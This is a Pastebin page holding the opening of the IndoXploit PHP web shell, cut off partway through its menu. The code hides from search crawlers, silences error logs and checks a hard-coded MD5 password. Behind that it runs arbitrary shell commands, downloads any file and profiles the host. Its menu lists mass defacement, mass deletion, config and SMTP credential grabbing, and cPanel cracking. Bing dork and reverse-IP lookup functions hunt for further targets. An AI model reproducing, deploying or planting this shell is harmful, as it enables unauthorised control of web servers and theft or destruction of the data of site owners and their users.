API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 2nd, 2018
230
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.42 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "7b4939a8af28c814f0c757bb10f40d3d"; // default: IndoXploit
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>IndoXploit</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted green;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56. <pre>
  57. ___________________________
  58. < root@indoxploit:~# w00t??? >
  59. ---------------------------
  60. \ , ,
  61. \ /( )`
  62. \ \ \___ / |
  63. /- _ `-/ '
  64. (/\/ \ \ /\
  65. / / | ` \
  66. O O ) / |
  67. `-^--'`< '
  68. (_.) _ ) /
  69. `.___/` /
  70. `-----' /
  71. <----. __ / __ \
  72. <----|====O)))==) \) /====
  73. <----' `--' `.__,' \
  74. | |
  75. \ /
  76. ______( (_ / \______
  77. ,' ,-----' | \
  78. `--{__________) \/
  79.  
  80. </pre>
  81. </header>
  82. <form method="post">
  83. <input type="password" name="pass">
  84. </form>
  85. <?php
  86. exit;
  87. }
  88. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  89. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  90. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  91. else
  92. login_shell();
  93. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  94. @ob_clean();
  95. $file = $_GET['file'];
  96. header('Content-Description: File Transfer');
  97. header('Content-Type: application/octet-stream');
  98. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  99. header('Expires: 0');
  100. header('Cache-Control: must-revalidate');
  101. header('Pragma: public');
  102. header('Content-Length: ' . filesize($file));
  103. readfile($file);
  104. exit;
  105. }
  106. ?>
  107. <html>
  108. <head>
  109. <title>IndoXploit</title>
  110. <meta name='author' content='IndoXploit'>
  111. <meta charset="UTF-8">
  112. <style type='text/css'>
  113. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  114. html {
  115. background: #000000;
  116. color: #ffffff;
  117. font-family: 'Ubuntu';
  118. font-size: 13px;
  119. width: 100%;
  120. }
  121. li {
  122. display: inline;
  123. margin: 5px;
  124. padding: 5px;
  125. }
  126. table, th, td {
  127. border-collapse:collapse;
  128. font-family: Tahoma, Geneva, sans-serif;
  129. background: transparent;
  130. font-family: 'Ubuntu';
  131. font-size: 13px;
  132. }
  133. .table_home, .th_home, .td_home {
  134. border: 1px solid #ffffff;
  135. }
  136. th {
  137. padding: 10px;
  138. }
  139. a {
  140. color: #ffffff;
  141. text-decoration: none;
  142. }
  143. a:hover {
  144. color: gold;
  145. text-decoration: underline;
  146. }
  147. b {
  148. color: gold;
  149. }
  150. input[type=text], input[type=password],input[type=submit] {
  151. background: transparent;
  152. color: #ffffff;
  153. border: 1px solid #ffffff;
  154. margin: 5px auto;
  155. padding-left: 5px;
  156. font-family: 'Ubuntu';
  157. font-size: 13px;
  158. }
  159. textarea {
  160. border: 1px solid #ffffff;
  161. width: 100%;
  162. height: 400px;
  163. padding-left: 5px;
  164. margin: 10px auto;
  165. resize: none;
  166. background: transparent;
  167. color: #ffffff;
  168. font-family: 'Ubuntu';
  169. font-size: 13px;
  170. }
  171. select {
  172. width: 152px;
  173. background: #000000;
  174. color: lime;
  175. border: 1px solid #ffffff;
  176. margin: 5px auto;
  177. padding-left: 5px;
  178. font-family: 'Ubuntu';
  179. font-size: 13px;
  180. }
  181. option:hover {
  182. background: lime;
  183. color: #000000;
  184. }
  185. </style>
  186. </head>
  187. <?php
  188. ###############################################################################
  189. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  190. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  191. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  192. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  193. // Greetz: All Member IndoXploit. & all my friends.
  194. ###############################################################################
  195. function w($dir,$perm) {
  196. if(!is_writable($dir)) {
  197. return "<font color=red>".$perm."</font>";
  198. } else {
  199. return "<font color=lime>".$perm."</font>";
  200. }
  201. }
  202. function r($dir,$perm) {
  203. if(!is_readable($dir)) {
  204. return "<font color=red>".$perm."</font>";
  205. } else {
  206. return "<font color=lime>".$perm."</font>";
  207. }
  208. }
  209. function exe($cmd) {
  210. if(function_exists('system')) {
  211. @ob_start();
  212. @system($cmd);
  213. $buff = @ob_get_contents();
  214. @ob_end_clean();
  215. return $buff;
  216. } elseif(function_exists('exec')) {
  217. @exec($cmd,$results);
  218. $buff = "";
  219. foreach($results as $result) {
  220. $buff .= $result;
  221. } return $buff;
  222. } elseif(function_exists('passthru')) {
  223. @ob_start();
  224. @passthru($cmd);
  225. $buff = @ob_get_contents();
  226. @ob_end_clean();
  227. return $buff;
  228. } elseif(function_exists('shell_exec')) {
  229. $buff = @shell_exec($cmd);
  230. return $buff;
  231. }
  232. }
  233. function perms($file){
  234. $perms = fileperms($file);
  235. if (($perms & 0xC000) == 0xC000) {
  236. // Socket
  237. $info = 's';
  238. } elseif (($perms & 0xA000) == 0xA000) {
  239. // Symbolic Link
  240. $info = 'l';
  241. } elseif (($perms & 0x8000) == 0x8000) {
  242. // Regular
  243. $info = '-';
  244. } elseif (($perms & 0x6000) == 0x6000) {
  245. // Block special
  246. $info = 'b';
  247. } elseif (($perms & 0x4000) == 0x4000) {
  248. // Directory
  249. $info = 'd';
  250. } elseif (($perms & 0x2000) == 0x2000) {
  251. // Character special
  252. $info = 'c';
  253. } elseif (($perms & 0x1000) == 0x1000) {
  254. // FIFO pipe
  255. $info = 'p';
  256. } else {
  257. // Unknown
  258. $info = 'u';
  259. }
  260. // Owner
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. // Group
  267. $info .= (($perms & 0x0020) ? 'r' : '-');
  268. $info .= (($perms & 0x0010) ? 'w' : '-');
  269. $info .= (($perms & 0x0008) ?
  270. (($perms & 0x0400) ? 's' : 'x' ) :
  271. (($perms & 0x0400) ? 'S' : '-'));
  272. // World
  273. $info .= (($perms & 0x0004) ? 'r' : '-');
  274. $info .= (($perms & 0x0002) ? 'w' : '-');
  275. $info .= (($perms & 0x0001) ?
  276. (($perms & 0x0200) ? 't' : 'x' ) :
  277. (($perms & 0x0200) ? 'T' : '-'));
  278. return $info;
  279. }
  280. function hdd($s) {
  281. if($s >= 1073741824)
  282. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  283. elseif($s >= 1048576)
  284. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  285. elseif($s >= 1024)
  286. return sprintf('%1.2f',$s / 1024 ) .' KB';
  287. else
  288. return $s .' B';
  289. }
  290. function ambilKata($param, $kata1, $kata2){
  291. if(strpos($param, $kata1) === FALSE) return FALSE;
  292. if(strpos($param, $kata2) === FALSE) return FALSE;
  293. $start = strpos($param, $kata1) + strlen($kata1);
  294. $end = strpos($param, $kata2, $start);
  295. $return = substr($param, $start, $end - $start);
  296. return $return;
  297. }
  298. function getsource($url) {
  299. $curl = curl_init($url);
  300. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  302. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  303. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  304. $content = curl_exec($curl);
  305. curl_close($curl);
  306. return $content;
  307. }
  308. function bing($dork) {
  309. $npage = 1;
  310. $npages = 30000;
  311. $allLinks = array();
  312. $lll = array();
  313. while($npage <= $npages) {
  314. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  315. if($x) {
  316. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  317. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  318. $npage = $npage + 10;
  319. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  320. } else break;
  321. }
  322. $URLs = array();
  323. foreach($allLinks as $url){
  324. $exp = explode("/", $url);
  325. $URLs[] = $exp[2];
  326. }
  327. $array = array_filter($URLs);
  328. $array = array_unique($array);
  329. $sss = count(array_unique($array));
  330. foreach($array as $domain) {
  331. echo $domain."\n";
  332. }
  333. }
  334. function reverse($url) {
  335. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  336. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  337. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  338. curl_setopt($ch, CURLOPT_HEADER, 0);
  339. curl_setopt($ch, CURLOPT_POST, 1);
  340. $resp = curl_exec($ch);
  341. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  342. $array = explode(",,", $resp);
  343. unset($array[0]);
  344. foreach($array as $lnk) {
  345. $lnk = "http://$lnk";
  346. $lnk = str_replace(",", "", $lnk);
  347. echo $lnk."\n";
  348. ob_flush();
  349. flush();
  350. }
  351. curl_close($ch);
  352. }
  353. if(get_magic_quotes_gpc()) {
  354. function idx_ss($array) {
  355. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  356. }
  357. $_POST = idx_ss($_POST);
  358. $_COOKIE = idx_ss($_COOKIE);
  359. }
  360.  
  361. if(isset($_GET['dir'])) {
  362. $dir = $_GET['dir'];
  363. chdir($dir);
  364. } else {
  365. $dir = getcwd();
  366. }
  367. $kernel = php_uname();
  368. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  369. $dir = str_replace("\\","/",$dir);
  370. $scdir = explode("/", $dir);
  371. $freespace = hdd(disk_free_space("/"));
  372. $total = hdd(disk_total_space("/"));
  373. $used = $total - $freespace;
  374. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  375. $ds = @ini_get("disable_functions");
  376. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  377. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  378. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  379. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  380. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  381. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  382. if(!function_exists('posix_getegid')) {
  383. $user = @get_current_user();
  384. $uid = @getmyuid();
  385. $gid = @getmygid();
  386. $group = "?";
  387. } else {
  388. $uid = @posix_getpwuid(posix_geteuid());
  389. $gid = @posix_getgrgid(posix_getegid());
  390. $user = $uid['name'];
  391. $uid = $uid['uid'];
  392. $group = $gid['name'];
  393. $gid = $gid['gid'];
  394. }
  395. echo "System: <font color=lime>".$kernel."</font><br>";
  396. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  397. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  398. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  399. echo "Safe Mode: $sm<br>";
  400. echo "Disable Functions: $show_ds<br>";
  401. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  402. echo "Current DIR: ";
  403. foreach($scdir as $c_dir => $cdir) {
  404. echo "<a href='?dir=";
  405. for($i = 0; $i <= $c_dir; $i++) {
  406. echo $scdir[$i];
  407. if($i != $c_dir) {
  408. echo "/";
  409. }
  410. }
  411. echo "'>$cdir</a>/";
  412. }
  413. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  414. echo "<hr>";
  415. echo "<center>";
  416. echo "<ul>";
  417. echo "<li>[ <a href='?'>Home</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  425. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  427. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!